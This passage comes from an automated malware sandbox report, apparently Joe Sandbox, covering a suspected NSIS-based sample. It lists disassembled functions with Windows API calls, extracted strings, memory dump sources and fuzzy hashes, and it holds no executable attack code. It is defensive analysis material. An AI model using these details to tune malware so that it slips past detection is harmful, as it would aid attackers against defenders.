CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

*?|<>/":, xrefs: 004066CE

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,75923420,004036EF), ref: 00405F46

Strings

nsa, xrefs: 00405F1A

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 0016A52F Relevance: 5.2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

Strings

$]q, xrefs: 0016A64A
Haq, xrefs: 0016A6EA
$]q, xrefs: 0016A63E
l4(, xrefs: 0016A538

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: Haq$l4($$]q$$]q
API String ID: 0-272083239
Opcode ID: 124ab042dbd19248507fa3b0850a08439ab570579bbacc342bd023b8ebbc7959
Instruction ID: 131941cb7ca5ea476838e2ca5dfd0cb62e68cd5ebe6cf762b0f5bf22f2de3727
Opcode Fuzzy Hash: 124ab042dbd19248507fa3b0850a08439ab570579bbacc342bd023b8ebbc7959
Instruction Fuzzy Hash: F351AF317046118FCB19AB399C6853E3AEBAFC574039D4469E403EB3A1EF24CD52CB92

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 00161A40 Relevance: 5.1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

Xaq, xrefs: 00161B2F
Xaq, xrefs: 00161A76
Xaq, xrefs: 00161AB0
Xaq, xrefs: 00161B7C

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: 78e84299092b22e347fb1ef3da7efbf56738a6e020586462f942bb3b72f999b8
Instruction ID: d0932c7e45d583259275ee1318d8f83b5ee2e164a1a3b18531ac185df81bda38
Opcode Fuzzy Hash: 78e84299092b22e347fb1ef3da7efbf56738a6e020586462f942bb3b72f999b8
Instruction Fuzzy Hash: B8318030E0121A9FDF658FB9CD403AEBAB6BF84310F1940A9C815A7254EB70CD95DB92

Function 001658E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 0016591A
\;]q, xrefs: 001658FE
\;]q, xrefs: 00165926
\;]q, xrefs: 001658F4

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: e4cd259a7335f4fb89384a10b153eb6c6cbefaec9de186159f5a471b1d0b5c98
Instruction ID: f76c8724b9a3b84dfbcdeaa467bc0c631769f37ac3b2c0d2e4a37d53c9ac6b21
Opcode Fuzzy Hash: e4cd259a7335f4fb89384a10b153eb6c6cbefaec9de186159f5a471b1d0b5c98
Instruction Fuzzy Hash: F4018431740915CFCB688E2DCC9092577EBAF88778B254569E445CB374DB31DC51C790

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

